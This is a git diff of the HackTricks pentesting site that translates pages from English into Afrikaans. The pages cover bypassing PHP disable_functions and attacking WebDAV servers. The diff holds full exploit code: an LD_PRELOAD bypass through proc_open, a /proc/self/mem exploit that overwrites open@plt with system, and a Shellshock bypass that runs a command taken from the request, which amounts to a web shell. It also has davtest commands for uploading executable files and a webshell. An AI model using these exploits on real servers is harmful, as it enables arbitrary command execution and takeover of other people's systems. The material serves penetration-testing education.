+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
-# PHP safe\_mode bypass via proc\_open\(\) and custom environment Exploit
-
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
+# PHP safe\_mode-bypass via proc\_open\(\) en aangepaste omgewing Exploit
 
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 ```php
  array("pipe", "r"),
- 1 => array("file", $path."/output.txt","w"),
- 2 => array("file", $path."/errors.txt", "a" )
+1 => array("file", $path."/output.txt","w"),
+2 => array("file", $path."/errors.txt", "a" )
 ); $cwd = '.'; $env = array('LD_PRELOAD' => $path."/a.so"); $process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r");
 echo "";
 while (!feof($a))
@@ -30,21 +27,16 @@ while (!feof($a))
 ?>;
 
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md
index 7fdd12b7d..7af73e434 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md
@@ -1,24 +1,21 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
 # via mem
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
-
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 ```php
 > 32;
-    $lower = $value & 0x00000000ffffffff;
-    return pack('V2', $lower, $higher);
+$higher = ($value & 0xffffffff00000000) >> 32;
+$lower = $value & 0x00000000ffffffff;
+return pack('V2', $lower, $higher);
 }
 function unp($value) {
-    return hexdec(bin2hex(strrev($value)));
+return hexdec(bin2hex(strrev($value)));
 }
 function parseelf($bin_ver, $rela = false) {
-    $bin = file_get_contents($bin_ver);
-    $e_shoff = unp(substr($bin, 0x28, 8));
-    $e_shentsize = unp(substr($bin, 0x3a, 2));
-    $e_shnum = unp(substr($bin, 0x3c, 2));
-    $e_shstrndx = unp(substr($bin, 0x3e, 2));
-    for($i = 0; $i < $e_shnum; $i += 1) {
-        $sh_type = unp(substr($bin, $e_shoff + $i * $e_shentsize + 4, 4));
-        if($sh_type == 11) { // SHT_DYNSYM
-            $dynsym_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8));
-            $dynsym_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8));
-            $dynsym_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8));
-        }
-        elseif(!isset($strtab_off) && $sh_type == 3) { // SHT_STRTAB
-            $strtab_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8));
-            $strtab_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8));
-        }
-        elseif($rela && $sh_type == 4) { // SHT_RELA
-            $relaplt_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8));
-            $relaplt_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8));
-            $relaplt_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8));
-        }
-    }
-    if($rela) {
-        for($i = $relaplt_off; $i < $relaplt_off + $relaplt_size; $i += $relaplt_entsize) {
-            $r_offset = unp(substr($bin, $i, 8));
-            $r_info = unp(substr($bin, $i + 8, 8)) >> 32;
-            $name_off = unp(substr($bin, $dynsym_off + $r_info * $dynsym_entsize, 4));
-            $name = '';
-            $j = $strtab_off + $name_off - 1;
-            while($bin[++$j] != "\0") {
-                $name .= $bin[$j];
-            }
-            if($name == 'open') {
-                return $r_offset;
-            }
-        }
-    }
-    else {
-        for($i = $dynsym_off; $i < $dynsym_off + $dynsym_size; $i += $dynsym_entsize) {
-            $name_off = unp(substr($bin, $i, 4));
-            $name = '';
-            $j = $strtab_off + $name_off - 1;
-            while($bin[++$j] != "\0") {
-                $name .= $bin[$j];
-            }
-            if($name == '__libc_system') {
-                $system_offset = unp(substr($bin, $i + 8, 8));
-            }
-            if($name == '__open') {
-                $open_offset = unp(substr($bin, $i + 8, 8));
-            }
-        }
-        return array($system_offset, $open_offset);
-    }
+$bin = file_get_contents($bin_ver);
+$e_shoff = unp(substr($bin, 0x28, 8));
+$e_shentsize = unp(substr($bin, 0x3a, 2));
+$e_shnum = unp(substr($bin, 0x3c, 2));
+$e_shstrndx = unp(substr($bin, 0x3e, 2));
+for($i = 0; $i < $e_shnum; $i += 1) {
+$sh_type = unp(substr($bin, $e_shoff + $i * $e_shentsize + 4, 4));
+if($sh_type == 11) { // SHT_DYNSYM
+$dynsym_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8));
+$dynsym_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8));
+$dynsym_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8));
+}
+elseif(!isset($strtab_off) && $sh_type == 3) { // SHT_STRTAB
+$strtab_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8));
+$strtab_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8));
+}
+elseif($rela && $sh_type == 4) { // SHT_RELA
+$relaplt_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8));
+$relaplt_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8));
+$relaplt_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8));
+}
+}
+if($rela) {
+for($i = $relaplt_off; $i < $relaplt_off + $relaplt_size; $i += $relaplt_entsize) {
+$r_offset = unp(substr($bin, $i, 8));
+$r_info = unp(substr($bin, $i + 8, 8)) >> 32;
+$name_off = unp(substr($bin, $dynsym_off + $r_info * $dynsym_entsize, 4));
+$name = '';
+$j = $strtab_off + $name_off - 1;
+while($bin[++$j] != "\0") {
+$name .= $bin[$j];
+}
+if($name == 'open') {
+return $r_offset;
+}
+}
+}
+else {
+for($i = $dynsym_off; $i < $dynsym_off + $dynsym_size; $i += $dynsym_entsize) {
+$name_off = unp(substr($bin, $i, 4));
+$name = '';
+$j = $strtab_off + $name_off - 1;
+while($bin[++$j] != "\0") {
+$name .= $bin[$j];
+}
+if($name == '__libc_system') {
+$system_offset = unp(substr($bin, $i + 8, 8));
+}
+if($name == '__open') {
+$open_offset = unp(substr($bin, $i + 8, 8));
+}
+}
+return array($system_offset, $open_offset);
+}
 }
 echo "[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org)\n";
 if(strpos(php_uname('a'), 'x86_64') === false) {
-    echo "[-] This exploit is for x64 Linux. Exiting\n";
-    exit;
+echo "[-] This exploit is for x64 Linux. Exiting\n";
+exit;
 }
 if(substr(php_uname('r'), 0, 4) < 2.98) {
-    echo "[-] Too old kernel (< 2.98). Might not work\n";
+echo "[-] Too old kernel (< 2.98). Might not work\n";
 }
 echo "[*] Trying to get open@plt offset in PHP binary\n";
 $open_php = parseelf('/proc/self/exe', true);
 if($open_php == 0) {
-    echo "[-] Failed. Exiting\n";
-    exit;
+echo "[-] Failed. Exiting\n";
+exit;
 }
 echo '[+] Offset is 0x' . dechex($open_php) . "\n";
 $maps = file_get_contents('/proc/self/maps');
@@ -124,8 +121,8 @@ echo "[*] Libc location: $r[1]\n";
 echo "[*] Trying to get open and system symbols from Libc\n";
 list($system_offset, $open_offset) = parseelf($r[1]);
 if($system_offset == 0 or $open_offset == 0) {
-    echo "[-] Failed. Exiting\n";
-    exit;
+echo "[-] Failed. Exiting\n";
+exit;
 }
 echo "[+] Got them. Seeking for address in memory\n";
 $mem = fopen('/proc/self/mem', 'rb');
@@ -139,27 +136,22 @@ echo "[*] Rewriting open@plt address\n";
 $mem = fopen('/proc/self/mem', 'wb');
 fseek($mem, $open_php);
 if(fwrite($mem, packlli($system_addr))) {
-    echo "[+] Address written. Executing cmd\n";
-    readfile('/usr/bin/id');
-    exit;
+echo "[+] Address written. Executing cmd\n";
+readfile('/usr/bin/id');
+exit;
 }
 echo "[-] Write failed. Exiting\n";
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md
index b65405259..f3d0897cd 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md
@@ -1,48 +1,45 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
-# PHP 5.2.4 ionCube extension Exploit
-
+# PHP 5.2.4 ionCube-uitbreiding Exploit
 ```php
 
ionCube output:

";
 echo $MyBoot_ioncube;
 ?>
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md
index 8c2c2ac86..d17c4a9c8 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md
@@ -1,63 +1,55 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
 
 # PHP 5.x Shellshock Exploit
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
-
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 ```php
 $tmp 2>&1");
-     // In Safe Mode, the user may only alter environment variables whose names
-     // begin with the prefixes supplied by this directive.
-     // By default, users will only be able to set environment variables that
-     // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
-     // PHP will let the user modify ANY environment variable!
-     mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
-   }
-   else return "Not vuln (not bash)";
-   $output = @file_get_contents($tmp);
-   @unlink($tmp);
-   if($output != "") return $output;
-   else return "No output, or not vuln.";
+if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
+$tmp = tempnam(".","data");
+putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
+// In Safe Mode, the user may only alter environment variables whose names
+// begin with the prefixes supplied by this directive.
+// By default, users will only be able to set environment variables that
+// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
+// PHP will let the user modify ANY environment variable!
+mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
+}
+else return "Not vuln (not bash)";
+$output = @file_get_contents($tmp);
+@unlink($tmp);
+if($output != "") return $output;
+else return "No output, or not vuln.";
 }
 echo shellshock($_REQUEST["cmd"]);
 ?>
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md
index 7c85fd1f2..f58956cc1 100644
--- a/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -3,145 +3,147 @@
 

 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
+Kry vandag toegang:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
-When dealing with a **HTTP Server with WebDav** enabled, it's possible to **manipulate files** if you have the right **credentials**, usually verified through **HTTP Basic Authentication**. Gaining control over such a server often involves the **upload and execution of a webshell**.
+Wanneer jy te doen het met 'n **HTTP-bediener met WebDav** wat geaktiveer is, is dit moontlik om lêers te **manipuleer** as jy die regte **geloofsbriewe** het, wat gewoonlik geverifieer word deur **HTTP Basiese Verifikasie**. Om beheer oor so 'n bediener te verkry, behels dikwels die **oplaai en uitvoering van 'n webshell**.
 
-Access to the WebDav server typically requires **valid credentials**, with [**WebDav bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) being a common method to acquire them.
+Toegang tot die WebDav-bedieners vereis tipies **geldige geloofsbriewe**, met [**WebDav-bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) wat 'n algemene metode is om dit te bekom.
 
-To overcome restrictions on file uploads, especially those preventing the execution of server-side scripts, you might:
+Om beperkings op lêeroplaai te oorkom, veral dié wat die uitvoering van bedienerkant-skripte voorkom, kan jy:
 
-- **Upload** files with **executable extensions** directly if not restricted.
-- **Rename** uploaded non-executable files (like .txt) to an executable extension.
-- **Copy** uploaded non-executable files, changing their extension to one that is executable.
+- **Lêers oplaai** met **uitvoerbare uitbreidings** direk as dit nie beperk word nie.
+- **Hernoem** opgelaai nie-uitvoerbare lêers (soos .txt) na 'n uitvoerbare uitbreiding.
+- **Kopieer** opgelaai nie-uitvoerbare lêers en verander hul uitbreiding na een wat uitvoerbaar is.
 
 ## DavTest
 
-**Davtest** try to **upload several files with different extensions** and **check** if the extension is **executed**:
-
+**Davtest** probeer om **verskeie lêers met verskillende uitbreidings** op te laai en **te kontroleer** of die uitbreiding **uitgevoer** word:
 ```bash
 davtest [-auth user:password] -move -sendbd auto -url http:// #Uplaod .txt files and try to move it to other extensions
 davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every extension
 ```
-
-Output sample:
+Uitsetvoorbeeld:
 
 ![](<../../.gitbook/assets/image (19) (1).png>)
 
-This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
+Dit beteken nie dat **.txt** en **.html-uitbreidings uitgevoer word** nie. Dit beteken dat jy toegang kan kry tot hierdie lêers deur die web.
 
 ## Cadaver
 
-You can use this tool to **connect to the WebDav** server and perform actions (like **upload**, **move** or **delete**) **manually**.
-
